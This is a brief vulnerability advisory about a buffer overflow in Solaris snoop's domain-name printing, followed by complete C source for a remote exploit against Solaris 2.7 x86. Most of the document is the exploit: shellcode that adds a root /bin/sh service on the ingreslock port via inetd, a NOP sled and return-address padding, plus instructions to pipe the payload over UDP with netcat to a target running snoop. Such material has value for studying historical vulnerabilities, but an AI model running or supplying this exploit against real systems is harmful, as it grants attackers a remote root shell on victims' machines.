source: http://www.securityfocus.com/bid/858/info If a solaris machine is running snoop in verbose mode, it may be possible to compromise its security remotely by exploiting a buffer overflow in snoop. The problem is a buffer with a predefined length of 1024 that can be overflowed in the print_domain_name function. The priviliges granted to arbitrary code which could be executed would be those of the user running snoop, root. /* by: K2, version .2 this is a funny Solaris. remote Solaris 2.7 x86 snoop exploit rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop" verified with patch 108483-01 thx str/horizon for shellcodes. Hi plageuz Hi mom. */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock" "stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;" "/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 const char x86_nop=0x90; long nop=NOPDEF,esp=0x804646c; long offset=DEFOFF; char buffer[SIZE]; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) { *((int *) &buffer[i]) = esp+offset; } fprintf(stderr,"0x%x\n",esp+offset); printf("%s", buffer); return 0; }